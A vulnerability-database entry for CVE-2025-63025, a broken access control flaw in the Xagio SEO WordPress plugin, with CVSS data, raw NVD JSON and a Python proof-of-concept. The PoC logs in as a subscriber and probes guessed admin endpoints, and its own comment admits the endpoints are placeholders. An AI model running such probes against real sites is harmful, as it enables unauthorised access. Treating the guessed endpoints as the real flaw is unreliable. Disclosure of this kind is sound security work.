Security Vulnerability Report
中文
CVE-2025-63025 CVSS 4.3 MEDIUM

CVE-2025-63025

Published: 2025-12-09 16:18:08
Last Modified: 2026-04-23 15:34:59

Description

Missing Authorization vulnerability in Xagio SEO Xagio SEO xagio-seo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xagio SEO: from n/a through <= 7.1.0.37.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xagio SEO WordPress Plugin <= 7.1.0.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63025 PoC - Missing Authorization in Xagio SEO # Target: WordPress site with Xagio SEO plugin <= 7.1.0.37 target = "http://target-wordpress-site.com" # Authenticate as low-privilege user (subscriber role) login_url = f"{target}/wp-login.php" session = requests.Session() # Login as subscriber login_data = { 'log': 'subscriber_username', 'pwd': 'subscriber_password', 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Exploit: Access admin-only Xagio SEO functionality # Replace endpoint with actual vulnerable endpoint vulnerable_endpoints = [ '/wp-json/xagio/v1/admin/settings', '/wp-json/xagio/v1/export/data', '/wp-admin/admin-ajax.php?action=xagio_admin_action' ] for endpoint in vulnerable_endpoints: url = f"{target}{endpoint}" response = session.get(url) if response.status_code == 200 and 'error' not in response.text.lower(): print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:500]}") else: print(f"[-] Endpoint protected or not found: {endpoint}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63025", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:08.363", "lastModified": "2026-04-23T15:34:58.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Xagio SEO Xagio SEO xagio-seo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xagio SEO: from n/a through <= 7.1.0.37."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/xagio-seo/vulnerability/wordpress-xagio-seo-plugin-7-1-0-29-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}